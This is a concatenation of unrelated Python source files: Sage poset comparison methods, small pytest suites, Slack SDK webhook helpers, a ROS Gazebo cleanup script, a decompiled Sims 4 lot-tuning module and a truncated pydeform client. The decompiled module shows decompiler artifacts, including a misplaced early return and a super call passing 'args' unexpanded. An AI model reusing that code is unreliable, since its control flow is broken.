(1, 0) <= (1, 0) = True
TESTS:
Check that :trac:`19999` is resolved::
sage: P = Poset((srange(2), lambda left, right: left <= right))
sage: Q = cartesian_product((P, P), order='product')
sage: R = cartesian_product((Q, P), order='lex')
sage: R(((1, 0), 0)) <= R(((0, 1), 0))
False
sage: R(((0, 1), 0)) <= R(((1, 0), 0))
False
"""
for l, r, S in \
zip(left.value, right.value, self.cartesian_factors()):
if l == r:
continue
if S.le(l, r):
return True
if S.le(r, l):
return False
return False # incomparable components
return True # equal
def le_product(self, left, right):
r"""
Test whether ``left`` is component-wise smaller or equal
to ``right``.
INPUT:
- ``left`` -- an element.
- ``right`` -- an element.
OUTPUT:
A boolean.
The comparison is ``True`` if the result of the
comparison in each component is ``True``.
EXAMPLES::
sage: P = Poset((srange(2), lambda left, right: left <= right))
sage: Q = cartesian_product((P, P), order='product')
sage: T = [Q((0, 0)), Q((1, 1)), Q((0, 1)), Q((1, 0))]
sage: for a in T:
....: for b in T:
....: assert(Q.le(a, b) == (a <= b))
....: print('%s <= %s = %s' % (a, b, a <= b))
(0, 0) <= (0, 0) = True
(0, 0) <= (1, 1) = True
(0, 0) <= (0, 1) = True
(0, 0) <= (1, 0) = True
(1, 1) <= (0, 0) = False
(1, 1) <= (1, 1) = True
(1, 1) <= (0, 1) = False
(1, 1) <= (1, 0) = False
(0, 1) <= (0, 0) = False
(0, 1) <= (1, 1) = True
(0, 1) <= (0, 1) = True
(0, 1) <= (1, 0) = False
(1, 0) <= (0, 0) = False
(1, 0) <= (1, 1) = True
(1, 0) <= (0, 1) = False
(1, 0) <= (1, 0) = True
"""
return all(
S.le(l, r)
for l, r, S in
zip(left.value, right.value, self.cartesian_factors()))
def le_native(self, left, right):
r"""
Test whether ``left`` is smaller or equal to ``right`` in the order
provided by the elements themselves.
INPUT:
- ``left`` -- an element.
- ``right`` -- an element.
OUTPUT:
A boolean.
EXAMPLES::
sage: P = Poset((srange(2), lambda left, right: left <= right))
sage: Q = cartesian_product((P, P), order='native')
sage: T = [Q((0, 0)), Q((1, 1)), Q((0, 1)), Q((1, 0))]
sage: for a in T:
....: for b in T:
....: assert(Q.le(a, b) == (a <= b))
....: print('%s <= %s = %s' % (a, b, a <= b))
(0, 0) <= (0, 0) = True
(0, 0) <= (1, 1) = True
(0, 0) <= (0, 1) = True
(0, 0) <= (1, 0) = True
(1, 1) <= (0, 0) = False
(1, 1) <= (1, 1) = True
(1, 1) <= (0, 1) = False
(1, 1) <= (1, 0) = False
(0, 1) <= (0, 0) = False
(0, 1) <= (1, 1) = True
(0, 1) <= (0, 1) = True
(0, 1) <= (1, 0) = True
(1, 0) <= (0, 0) = False
(1, 0) <= (1, 1) = True
(1, 0) <= (0, 1) = False
(1, 0) <= (1, 0) = True
"""
return left.value <= right.value
class Element(CartesianProduct.Element):
def _le_(self, other):
r"""
Return if this element is less or equal to ``other``.
INPUT:
- ``other`` -- an element.
OUTPUT:
A boolean.
.. NOTE::
This method calls :meth:`CartesianProductPoset.le`. Override
it in inherited class to change this.
It can be assumed that this element and ``other`` have
the same parent.
TESTS::
sage: from sage.combinat.posets.cartesian_product import CartesianProductPoset
sage: QQ.CartesianProduct = CartesianProductPoset # needed until #19269 is fixed
sage: def le_sum(left, right):
....: return (sum(left) < sum(right) or
....: sum(left) == sum(right) and left[0] <= right[0])
sage: C = cartesian_product((QQ, QQ), order=le_sum)
sage: C((1/3, 2)) <= C((2, 1/3)) # indirect doctest
True
sage: C((1/3, 2)) <= C((2, 2)) # indirect doctest
True
"""
return self.parent().le(self, other)
def __le__(self, other):
r"""
Return if this element is less than or equal to ``other``.
INPUT:
- ``other`` -- an element.
OUTPUT:
A boolean.
.. NOTE::
This method uses the coercion framework to find a
suitable common parent.
This method can be deleted once :trac:`10130` is fixed and
provides these methods automatically.
TESTS::
sage: from sage.combinat.posets.cartesian_product import CartesianProductPoset
sage: QQ.CartesianProduct = CartesianProductPoset # needed until #19269 is fixed
sage: def le_sum(left, right):
....: return (sum(left) < sum(right) or
....: sum(left) == sum(right) and left[0] <= right[0])
sage: C = cartesian_product((QQ, QQ), order=le_sum)
sage: C((1/3, 2)) <= C((2, 1/3))
True
sage: C((1/3, 2)) <= C((2, 2))
True
The following example tests that the coercion gets involved in
comparisons; it can be simplified once :trac:`18182` is merged.
::
sage: class MyCP(CartesianProductPoset):
....: def _coerce_map_from_(self, S):
....: if isinstance(S, self.__class__):
....: S_factors = S.cartesian_factors()
....: R_factors = self.cartesian_factors()
....: if len(S_factors) == len(R_factors):
....: if all(r.has_coerce_map_from(s)
....: for r,s in zip(R_factors, S_factors)):
....: return True
sage: QQ.CartesianProduct = MyCP
sage: A = cartesian_product((QQ, ZZ), order=le_sum)
sage: B = cartesian_product((QQ, QQ), order=le_sum)
sage: A((1/2, 4)) <= B((1/2, 5))
True
"""
from sage.structure.element import have_same_parent
if have_same_parent(self, other):
return self._le_(other)
from sage.structure.element import get_coercion_model
import operator
try:
return get_coercion_model().bin_op(self, other, operator.le)
except TypeError:
return False
def __ge__(self, other):
r"""
Return if this element is greater than or equal to ``other``.
INPUT:
- ``other`` -- an element.
OUTPUT:
A boolean.
.. NOTE::
This method uses the coercion framework to find a
suitable common parent.
This method can be deleted once :trac:`10130` is fixed and
provides these methods automatically.
TESTS::
sage: from sage.combinat.posets.cartesian_product import CartesianProductPoset
sage: QQ.CartesianProduct = CartesianProductPoset # needed until #19269 is fixed
sage: def le_sum(left, right):
....: return (sum(left) < sum(right) or
....: sum(left) == sum(right) and left[0] <= right[0])
sage: C = cartesian_product((QQ, QQ), order=le_sum)
sage: C((1/3, 2)) >= C((2, 1/3))
False
sage: C((1/3, 2)) >= C((2, 2))
False
"""
return other <= self
def __lt__(self, other):
r"""
Return if this element is less than ``other``.
INPUT:
- ``other`` -- an element.
OUTPUT:
A boolean.
.. NOTE::
This method uses the coercion framework to find a
suitable common parent.
This method can be deleted once :trac:`10130` is fixed and
provides these methods automatically.
TESTS::
sage: from sage.combinat.posets.cartesian_product import CartesianProductPoset
sage: QQ.CartesianProduct = CartesianProductPoset # needed until #19269 is fixed
sage: def le_sum(left, right):
....: return (sum(left) < sum(right) or
....: sum(left) == sum(right) and left[0] <= right[0])
sage: C = cartesian_product((QQ, QQ), order=le_sum)
sage: C((1/3, 2)) < C((2, 1/3))
True
sage: C((1/3, 2)) < C((2, 2))
True
"""
return not self == other and self <= other
def __gt__(self, other):
r"""
Return if this element is greater than ``other``.
INPUT:
- ``other`` -- an element.
OUTPUT:
A boolean.
.. NOTE::
This method uses the coercion framework to find a
suitable common parent.
This method can be deleted once :trac:`10130` is fixed and
provides these methods automatically.
TESTS::
sage: from sage.combinat.posets.cartesian_product import CartesianProductPoset
sage: QQ.CartesianProduct = CartesianProductPoset # needed until #19269 is fixed
sage: def le_sum(left, right):
....: return (sum(left) < sum(right) or
....: sum(left) == sum(right) and left[0] <= right[0])
sage: C = cartesian_product((QQ, QQ), order=le_sum)
sage: C((1/3, 2)) > C((2, 1/3))
False
sage: C((1/3, 2)) > C((2, 2))
False
"""
return not self == other and other <= self
|
#!/usr/bin/env python3
import warnings
import pytest
import rocks
@pytest.mark.parametrize("id_", ["Fortuna", "doesnotexist", "Ceres"])
def test_get_ssoCard(id_):
warnings.filterwarnings("ignore", "UserWarning")
card = rocks.ssodnet.get_ssocard(id_)
if id_ == "Ceres":
assert isinstance(card, dict)
else:
assert card is None
|
import logging
from typing import Optional, Dict, Any
from slack_sdk.web.internal_utils import (
_parse_web_class_objects,
get_user_agent,
convert_bool_to_0_or_1,
)
from .webhook_response import WebhookResponse
def _build_body(original_body: Optional[Dict[str, Any]]) -> Optional[Dict[str, Any]]:
if original_body:
body = {k: v for k, v in original_body.items() if v is not None}
body = convert_bool_to_0_or_1(body)
_parse_web_class_objects(body)
return body
return None
def _build_request_headers(
default_headers: Dict[str, str],
additional_headers: Optional[Dict[str, str]],
) -> Dict[str, str]:
if default_headers is None and additional_headers is None:
return {}
request_headers = {
"Content-Type": "application/json;charset=utf-8",
}
if default_headers is None or "User-Agent" not in default_headers:
request_headers["User-Agent"] = get_user_agent()
request_headers.update(default_headers)
if additional_headers:
request_headers.update(additional_headers)
return request_headers
def _debug_log_response(logger, resp: WebhookResponse) -> None:
if logger.level <= logging.DEBUG:
logger.debug(
"Received the following response - "
f"status: {resp.status_code}, "
f"headers: {(dict(resp.headers))}, "
f"body: {resp.body}"
)
|
from unittest.mock import Mock
import pytest
from atst.domain.permission_sets import PermissionSets
from atst.models import Permissions
from atst.utils.context_processors import (
get_resources_from_context,
user_can_view,
portfolio as portfolio_context,
)
from tests.factories import *
def test_get_resources_from_context():
portfolio = PortfolioFactory.create()
task_order = TaskOrderFactory.create(portfolio=portfolio)
application = ApplicationFactory.create(portfolio=portfolio)
environment = EnvironmentFactory.create(application=application)
assert get_resources_from_context({"portfolio_id": portfolio.id}) == (portfolio,)
assert get_resources_from_context({"application_id": application.id}) == (
portfolio,
application,
)
assert get_resources_from_context({"environment_id": environment.id}) == (
portfolio,
application,
)
assert get_resources_from_context({"task_order_id": task_order.id}) == (
portfolio,
task_order,
)
@pytest.fixture
def set_g(monkeypatch):
_g = Mock()
monkeypatch.setattr("atst.utils.context_processors.g", _g)
def _set_g(attr, val):
setattr(_g, attr, val)
yield _set_g
def test_user_can_view(set_g):
owner = UserFactory.create()
app_user = UserFactory.create()
rando = UserFactory.create()
portfolio = PortfolioFactory.create(owner=owner)
application = ApplicationFactory.create(portfolio=portfolio)
ApplicationRoleFactory.create(
user=app_user,
application=application,
permission_sets=PermissionSets.get_many([PermissionSets.VIEW_APPLICATION]),
)
set_g("portfolio", portfolio)
set_g("application", application)
set_g("current_user", owner)
assert user_can_view(Permissions.VIEW_APPLICATION)
set_g("current_user", app_user)
assert user_can_view(Permissions.VIEW_APPLICATION)
set_g("current_user", rando)
assert not user_can_view(Permissions.VIEW_APPLICATION)
def test_portfolio_no_user(set_g):
set_g("current_user", None)
assert portfolio_context() == {}
def test_portfolio_with_user(set_g):
user = UserFactory.create()
set_g("current_user", user)
set_g("portfolio", None)
assert portfolio_context() != {}
|
#!/usr/bin/env python
# Copyright (c) 2013-2015, Rethink Robotics
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the Rethink Robotics nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
Baxter RSDK Inverse Kinematics Pick and Place Demo
*** modified ***
modelState service
placing picture
three blocks
Biggest part of the file was created by Rethink Robotics.
For my project I creates the following functions:
load_gazebo_models
number_to_configuration
delete_gazebo_models
get_model_pose
get_actual_pose
"""
import signal
import rospy
import os
from gazebo_msgs.srv import (
SpawnModel,
SetModelState,
DeleteModel,
GetModelState,
)
def signal_handler():
print('Signal handler')
def delete_model(model_name, delete_service = None):
if(delete_service == None):
delete_service = rospy.ServiceProxy('/gazebo/delete_model', DeleteModel)
rospy.wait_for_service('/gazebo/delete_model')
try:
delete_service(model_name)
except rospy.ServiceException, e:
rospy.loginfo("Delete Model service call failed: {0}".format(e))
def delete_all(parametr='bottles'):
delete_service = rospy.ServiceProxy('/gazebo/delete_model', DeleteModel)
rospy.wait_for_service('/gazebo/delete_model')
for num in [1,2,3,4,5,6]:
delete_model("bottle_" + str(num), delete_service)
for num in [1,2,3]:
delete_model("cup_" + str(num), delete_service)
if __name__ == '__main__':
delete_all('bottles')
# load_models() |
# uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]
# Embedded file name: T:\InGame\Gameplay\Scripts\Server\world\lot_tuning.py
# Compiled at: 2020-04-27 21:48:35
# Size of source mod 2**32: 27675 bytes
import collections, math
from audio.primitive import TunablePlayAudio
from event_testing.resolver import SingleObjectResolver
from event_testing.tests import TunableTestSet
from interactions import ParticipantType
from objects.components.state import TunableStateValueReference
from objects.components.types import VEHICLE_COMPONENT
from sims4.tuning.instances import HashedTunedInstanceMetaclass
from sims4.tuning.tunable import TunableMapping, TunableLotDescription, TunableRegionDescription, HasTunableReference, TunableWorldDescription, TunableReference, TunableList, TunableFactory, TunableTuple, TunableVariant, Tunable, OptionalTunable
from situations.ambient.walkby_tuning import SchedulingWalkbyDirector
import event_testing.state_tests, objects.object_tests, services, sims4.log, situations.ambient.walkby_tuning
logger = sims4.log.Logger('LotTuning')
class LotTuning(HasTunableReference, metaclass=HashedTunedInstanceMetaclass, manager=services.lot_tuning_manager()):
INSTANCE_TUNABLES = {'walkby':situations.ambient.walkby_tuning.WalkbyTuning.TunableReference(allow_none=True),
'walkby_schedule':SchedulingWalkbyDirector.TunableReference(allow_none=True),
'audio_sting':OptionalTunable(description='\n If enabled then the specified audio sting will play at the end\n of the camera lerp when the lot is loaded.\n ',
tunable=TunablePlayAudio(description='\n The sound to play at the end of the camera lerp when the\n lot is loaded.\n ')),
'travel_audio_sting':OptionalTunable(description="\n If enabled then the specified audio sting will play at the end\n of the camera lerp after a travel. If disabled, 'Audio Sting'\n will play instead if it is enabled.\n ",
tunable=TunablePlayAudio(description='\n The sound to play at when entering the lot after a travel.\n ')),
'track_premade_status':Tunable(description="\n If enabled, the lot will be flagged as no longer premade when the\n player enters buildbuy on the lot or drops items/lots/rooms from\n the gallery. Otherwise, the lot is still considered premade.\n If disabled, the game won't care if this lot is premade or not.\n \n For example, the retail lots that were shipped with EP01 will track\n the premade status so we know if objects should automatically be\n set for sale.\n ",
tunable_type=bool,
default=False)}
class LotTuningMaps:
LOT_TO_LOTTUNING_MAP = TunableMapping(description="\n Mapping of Lot Description ID to lot tuning. This is a reference to \n a specific lot in one of our regions. e.g. Goth's mansion lot.\n ",
key_name='Lot Description ID',
key_type=TunableLotDescription(pack_safe=True),
value_name='Lot Tuning',
value_type=(LotTuning.TunablePackSafeReference()))
STREET_TO_LOTTUNING_MAP = TunableMapping(description='\n Mapping of Street Description ID to lot tuning. Street and world\n are analogous terms. e.g. suburbs street in Garden District.\n \n This represents the tuning for all lots within this street that does\n not have a specific LotTuning specified for itself in the \n LOT_TO_LOTTUNING_MAP.\n ',
key_name='Street Description ID',
key_type=TunableWorldDescription(pack_safe=True),
value_name='Lot Tuning',
value_type=(LotTuning.TunablePackSafeReference()))
REGION_TO_LOTTUNING_MAP = TunableMapping(description='\n Mapping of Region Description ID to spawner tuning. Region and \n neighborhood are analogous terms. e.g. Garden District.\n \n This represents the tuning for all lots in the region that does\n not have a specific LotTuning specified for itself in either the \n LOT_TO_LOTTUNING_MAP or via STREET_TO_LOTTUNING_MAP.\n ',
key_name='Region Description ID',
key_type=TunableRegionDescription(pack_safe=True),
value_name='Lot Tuning',
value_type=(LotTuning.TunablePackSafeReference()))
@classmethod
def get_lot_tuning(cls):
current_zone = services.current_zone()
lot = current_zone.lot
if lot is None:
logger.warn('Attempting to get LotTuning when the current zone does not have a lot.', owner='manus')
return
world_description_id, lot_description_id = services.get_world_and_lot_description_id_from_zone_id(current_zone.id)
lot_tuning = cls.LOT_TO_LOTTUNING_MAP.get(lot_description_id)
if lot_tuning is not None:
return lot_tuning
lot_tuning = cls.STREET_TO_LOTTUNING_MAP.get(world_description_id, None)
if lot_tuning is not None:
return lot_tuning
neighborhood_id = current_zone.neighborhood_id
if neighborhood_id == 0:
logger.warn('Attempting to get LotTuning when the current zone does not have a neighborhood.', owner='manus')
return
neighborhood_proto_buff = services.get_persistence_service().get_neighborhood_proto_buff(neighborhood_id)
region_id = neighborhood_proto_buff.region_id
lot_tuning = cls.REGION_TO_LOTTUNING_MAP.get(region_id, None)
return lot_tuning
class AllItems(TunableFactory):
@staticmethod
def factory(_):
return sims4.math.POS_INFINITY
FACTORY_TYPE = factory
def __init__(self, *args, **kwargs):
super().__init__(description='\n Process all of the objects on the lot.\n ')
class StatisticValue(TunableFactory):
@staticmethod
def factory(lot, statistic):
statistic_value = lot.get_stat_value(statistic)
if statistic_value is None:
return 0
return math.floor(statistic_value)
FACTORY_TYPE = factory
def __init__(self, *args, **kwargs):
super().__init__(statistic=TunableReference(description='\n The statistic on the lot that will be used to determine the\n number of objects to process.\n If the statistic is not found then the number 0 is used instead.\n ',
manager=(services.get_instance_manager(sims4.resources.Types.STATISTIC))),
description='\n Return the value of a statistic on the lot. If the statistic\n is not found then the number 0 is used instead.\n ')
class StatisticDifference(TunableFactory):
@staticmethod
def factory(lot, statistic_1, statistic_2):
statistic_1_value = lot.get_stat_value(statistic_1)
if statistic_1_value is None:
statistic_1_value = 0
statistic_2_value = lot.get_stat_value(statistic_2)
if statistic_2_value is None:
statistic_2_value = 0
return math.floor(abs(statistic_1_value - statistic_2_value))
FACTORY_TYPE = factory
def __init__(self, *args, **kwargs):
super().__init__(statistic_1=TunableReference(description='\n The first statistic that will be used with the second statistic\n in order to discover the number of objects on the lot to\n process.\n \n If the statistic is not found then the number 0 is use instead.\n ',
manager=(services.get_instance_manager(sims4.resources.Types.STATISTIC))),
statistic_2=TunableReference(description='\n The second statistic that will be used with the first statistic\n in order to discover the number of objects on the lot to\n process.\n \n If the statistic is not found then the number 0 is use instead.\n ',
manager=(services.get_instance_manager(sims4.resources.Types.STATISTIC))),
description='\n Return the difference between two different statistics and use\n that as the amount of objects to process.\n If the statistics cannot be found the value 0 is used instead.\n ')
class SetState(TunableFactory):
@staticmethod
def factory(obj, _, state):
if obj.state_component:
if obj.has_state(state.state):
obj.set_state((state.state), state, immediate=True)
FACTORY_TYPE = factory
def __init__(self, *args, **kwargs):
super().__init__(state=TunableStateValueReference(description='\n An state that we want to set the object to.\n '),
description='\n Change the state of an object to the tuned state.\n ')
class DestroyObject(TunableFactory):
@staticmethod
def factory(obj, _):
GlobalLotTuningAndCleanup.objects_to_destroy.add(obj)
FACTORY_TYPE = factory
def __init__(self, *args, **kwargs):
super().__init__(description='\n Destroy the object.\n ')
class CleanupVehicle(TunableFactory):
@staticmethod
def factory(obj, _):
vehicle_component = obj.get_component(VEHICLE_COMPONENT)
household_owner_id = obj.get_household_owner_id()
if vehicle_component is not None:
if household_owner_id is None or household_owner_id == 0:
if not obj.interaction_refs:
GlobalLotTuningAndCleanup.objects_to_destroy.add(obj)
FACTORY_TYPE = factory
def __init__(self, *args, **kwargs):
(super().__init__)(args, description="\n Cleanup a vehicle that isn't being used by destroying it.\n ", **kwargs)
class ConstantAmount(TunableFactory):
@staticmethod
def factory(_, amount):
return amount
FACTORY_TYPE = factory
def __init__(self, *args, **kwargs):
super().__init__(amount=Tunable(description='\n A constant amount to change the statistic by.\n ',
tunable_type=float,
default=0.0),
description='\n A constant amount.\n ')
class StatisticBased(TunableFactory):
@staticmethod
def factory(lot, statistic, multiplier):
statistic_value = lot.get_stat_value(statistic)
if statistic_value is None:
return 0
return statistic_value * multiplier
FACTORY_TYPE = factory
def __init__(self, *args, **kwargs):
super().__init__(statistic=TunableReference(description="\n A statistic on the lot who's value will be used as the amount\n to modify a statistic.\n If no value is found the number 0 is used.\n ",
manager=(services.get_instance_manager(sims4.resources.Types.STATISTIC))),
multiplier=Tunable(description='\n A multiplier on the statistic value of the statistic on the lot.\n ',
tunable_type=float,
default=1.0),
description='\n An amount that is based on the statistic value of a statistic\n on the lot.\n ')
class StatisticChange(TunableFactory):
@staticmethod
def factory(obj, lot, statistic, amount):
obj.add_statistic_component()
stat_instance = obj.get_stat_instance(statistic)
if stat_instance is None:
return
stat_change = amount(lot)
stat_instance.add_value(stat_change)
FACTORY_TYPE = factory
def __init__(self, *args, **kwargs):
super().__init__(statistic=TunableReference(description='\n The statistic to be changed on the object.\n ',
manager=(services.get_instance_manager(sims4.resources.Types.STATISTIC))),
amount=TunableVariant(constant=(ConstantAmount()),
statistic_based=(StatisticBased()),
description='\n The amount to modify the statistic by.\n '),
description='\n Modify the statistic value of an object.\n ')
class GlobalLotTuningAndCleanup:
OBJECT_COUNT_TUNING = TunableMapping(description='\n Mapping between statistic and a set of tests that are run over the\n objects on the lot on save. The value of the statistic is set to the\n number of objects that pass the tests.\n ',
key_type=TunableReference(description='\n The statistic on the lot that will be set the value of the number\n of objects that pass the test set that it is mapped to.\n ',
manager=(services.get_instance_manager(sims4.resources.Types.STATISTIC)),
pack_safe=True),
value_type=TunableTestSet(description='\n Test set that will be run on all objects on the lot to determine\n what the value of the key statistic should be set to.\n '))
SET_STATISTIC_TUNING = TunableList(description='\n A list of statistics and values that they will be set to on the lot\n while saving it when the lot was running.\n \n These values are set before counting by tests on objects.\n ',
tunable=TunableTuple(statistic=TunableReference(description='\n The statistic that will have its value set.\n ',
manager=(services.get_instance_manager(sims4.resources.Types.STATISTIC))),
amount=Tunable(description='\n The value that the statistic will be set to.\n ',
tunable_type=float,
default=0.0)))
OBJECT_CLEANUP_TUNING = TunableList(description='\n A list of actions to take when spinning up a zone in order to fix it\n up based on statistic values that the lot has.\n ',
tunable=TunableTuple(count=TunableVariant(all_items=(AllItems()),
statistic_value=(StatisticValue()),
statistic_difference=(StatisticDifference()),
default='all_items',
description='\n The maximum number of items that will have the action run\n on them. \n '),
possible_actions=TunableList(description='\n The different possible actions that can be taken on objects on\n the lot if tests pass.\n ',
tunable=TunableTuple(actions=TunableList(description='\n A group of actions to be taken on the object.\n ',
tunable=TunableVariant(set_state=(SetState()),
destroy_object=(DestroyObject()),
statistic_change=(StatisticChange()),
cleanup_vehicle=(CleanupVehicle()),
default='set_state',
description='\n The actual action that will be performed on the\n object if test passes.\n ')),
tests=TunableTestSet(description='\n Tests that if they pass the object will be under\n consideration for this action being done on them.\n ')))))
objects_to_destroy = None
_count_tuning_optimizer = None
@classmethod
def _get_stat_count_optimizer(cls):
if cls._count_tuning_optimizer is None:
cls._count_tuning_optimizer = ObjectCountTuningOptimizer(cls.OBJECT_COUNT_TUNING)
return cls._count_tuning_optimizer
@classmethod
def calculate_object_quantity_statistic_values(cls, lot):
for set_statatistic in cls.SET_STATISTIC_TUNING:
lot.set_stat_value(set_statatistic.statistic, set_statatistic.amount)
new_statistic_values = collections.defaultdict(int)
stat_counter = cls._get_stat_count_optimizer()
for obj in services.object_manager().values():
if obj.is_sim:
continue
if not obj.is_on_active_lot():
continue
stat_counter.increment_statistics(obj, new_statistic_values)
for statistic, value in new_statistic_values.items():
lot.set_stat_value(statistic, value)
@classmethod
def cleanup_objects(cls, lot=None):
if lot is None:
logger.error('Lot is None when trying to run lot cleanup.', owner='jjacobson')
return
cls.objects_to_destroy = set()
for cleanup in GlobalLotTuningAndCleanup.OBJECT_CLEANUP_TUNING:
items_to_cleanup = cleanup.count(lot)
if items_to_cleanup == 0:
continue
items_cleaned_up = 0
for obj in services.object_manager().values():
if items_cleaned_up >= items_to_cleanup:
break
if obj.is_sim:
continue
resolver = SingleObjectResolver(obj)
run_action = False
for possible_action in cleanup.possible_actions:
if possible_action.tests.run_tests(resolver):
for action in possible_action.actions:
action(obj, lot)
run_action = True
if run_action:
items_cleaned_up += 1
for obj in cls.objects_to_destroy:
obj.destroy(source=lot, cause='Cleaning up the lot')
cls.objects_to_destroy = None
class ObjectCountTuningOptimizer:
def __init__(self, tuning):
self._tag_to_test_mapping = None
self._state_to_test_mapping = None
self._relevant_tags = None
self.analyze_tuning(tuning)
def analyze_tuning(self, tuning):
self._tag_to_test_mapping = collections.defaultdict(list)
self._state_to_test_mapping = collections.defaultdict(list)
self._relevant_tags = set()
ObjectCriteriaTest = objects.object_tests.ObjectCriteriaTest
StateTest = event_testing.state_tests.StateTest
for statistic, test_set in tuning.items():
for test_list in test_set:
for test in test_list:
if isinstance(test, ObjectCriteriaTest):
subject_specific_tests = test.subject_specific_tests
if subject_specific_tests.subject_type == ObjectCriteriaTest.ALL_OBJECTS:
logger.error("Object count criteria test can not use type 'All Objects'")
continue
if subject_specific_tests.target != ParticipantType.Object:
logger.error('Object count criteria test must target ParticipantType.Object, not {}', subject_specific_tests.single_object.target)
continue
if not hasattr(test, 'identity_test'):
logger.error('Object count criteria test must have tags')
continue
identity_test_tags = test.identity_test.tag_set
for tag in identity_test_tags:
self._tag_to_test_mapping[tag].append((test_set, statistic))
self._relevant_tags.update(identity_test_tags)
elif isinstance(test, StateTest):
if test.who != ParticipantType.Object:
logger.error('Object count state test must target ParticipantType.Object, not {}', test.who)
continue
if test.fallback_behavior != StateTest.ALWAYS_FAIL:
logger.error("Object count state test must use 'Always Fail'")
continue
state = test.value.state
self._state_to_test_mapping[state].append((test_set, statistic))
else:
logger.error('Object count tuning only supports tag-based object criteria tests and state tests, not {}', test)
def increment_statistics(self, obj, statistic_values):
tests_to_run = collections.defaultdict(TestSetStats)
tags = {t for t in self._relevant_tags if obj.definition.has_build_buy_tag(t)}
if tags:
for tag in tags:
test_list = self._tag_to_test_mapping[tag]
for test_set, statistic in test_list:
test_set_stats = tests_to_run[id(test_set)]
test_set_stats.test_set = test_set
test_set_stats.stats.append(statistic)
else:
state_component = obj.state_component
if state_component is not None:
for state, test_list in self._state_to_test_mapping.items():
if state_component.has_state(state):
for test_set, statistic in test_list:
test_set_stats = tests_to_run[id(test_set)]
test_set_stats.test_set = test_set
test_set_stats.stats.append(statistic)
return tests_to_run or None
resolver = SingleObjectResolver(obj)
incremented_statistics = set()
for test_set_stats in tests_to_run.values():
if test_set_stats.test_set.run_tests(resolver):
for statistic in test_set_stats.stats:
if statistic not in incremented_statistics:
statistic_values[statistic] += 1
incremented_statistics.add(statistic)
class TestSetStats:
__slots__ = ('test_set', 'stats')
def __init__(self):
self.test_set = None
self.stats = [] |
# -*- coding: utf-8 -*-
import requests
from pydeform.auth import (
get_session_http_auth_header,
get_token_http_auth_header
)
from pydeform.resources import (
CollectionListResource,
CollectionOneResource,
CurrentProjectInfoResource,
DocumentListResource,
DocumentOneResource,
NonAuthUserResource,
ProjectListResource,
ProjectOneResource,
SessionUserResource
)
from pydeform.utils import get_base_uri
_DOCS_DATA = {
'requests_session_url': (
'http://docs.python-requests.org/en/master/user/advanced/#session-objects'
),
'requests_request_url': (
'http://docs.python-requests.org/en/master/api/#requests.request'
)
}
class Client(object):
__doc__ = """Deform.io python client class.
Parameters:
* `host` - HTTP server host. E.g. `deform.io`.
* `port` - HTTP server port. Default is `None`.
* `secure` - if `True` client will make secure request via `https`.
Default is `True`.
* `requests_session` - python requests' [Session][requests-session]
instance. Default is `None`.
* `request_defaults` - python requests' [request][requests-request]
defaults. Default is `None`.
* `api_base_path` - HTTP server's api uri base path. Default is `/api/`.
Example:
```python
client = Client(host='deform.io')
```
[requests-session]: %(requests_session_url)s
[requests-request]: %(requests_request_url)s
""" % {
'requests_session_url': _DOCS_DATA['requests_session_url'],
'requests_request_url': _DOCS_DATA['requests_request_url'],
}
def __init__(self,
host,
port=None,
secure=True,
requests_session=None,
request_defaults=None,
api_base_path='/api/'):
self.host = host
self.port = port
self.secure = secure
self.requests_session = requests_session or requests.Session()
self.request_defaults = request_defaults
self.api_base_path = api_base_path
self.user = NonAuthUserResource(
base_uri=get_base_uri(
host=self.host,
port=self.port,
secure=self.secure,
api_base_path=self.api_base_path
),
auth_header=None,
requests_session=self.requests_session,
request_defaults=self.request_defaults
)
def auth(self, auth_type, auth_key, project_id=None):
"""Creates authenticated client.
Parameters:
* `auth_type` - Authentication type. Use `session` for auth
by session key. Use `token` for auth by token.
* `auth_key` - Authentication `session key` or `token`.
* `project_id` - Project identifier. Must be provided for
`token` authentication. Default is `None`.
Returns:
* Instance of [SessionAuthClient](#sessionauthclient) if
`auth_type` is `session`.
* Instance of [ProjectClient](#projectclient) if
`auth_type` is `token`
Raises:
* ValueError: if `project_id` parameter was not provided
Examples:
For auth with `session` you should obtain session key by
[Client.user.login](#clientuserlogin) providing
your account's email and password:
```python
client = Client(host='deform.io')
session_client = client.auth(
'session',
client.user.login(
email='[email protected]',
password='password'
),
)
print session_client
<pydeform.client.SessionAuthClient object at 0x10c585650>
```
Authentication with `token` example:
```python
client = Client(host='deform.io')
token_client = client.auth(
'token',
auth_key='token-value',
project_id='some-project',
)
print token_client
<pydeform.client.ProjectClient object at 0x11c585650>
```
"""
if auth_type == 'session':
return SessionAuthClient(
auth_header=get_session_http_auth_header(auth_key),
host=self.host,
port=self.port,
secure=self.secure,
requests_session=self.requests_session,
request_defaults=self.request_defaults,
api_base_path=self.api_base_path,
)
elif auth_type == 'token':
if not project_id:
msg = 'You should provide project_id for token authentication'
raise ValueError(msg)
return ProjectClient(
base_uri=get_base_uri(
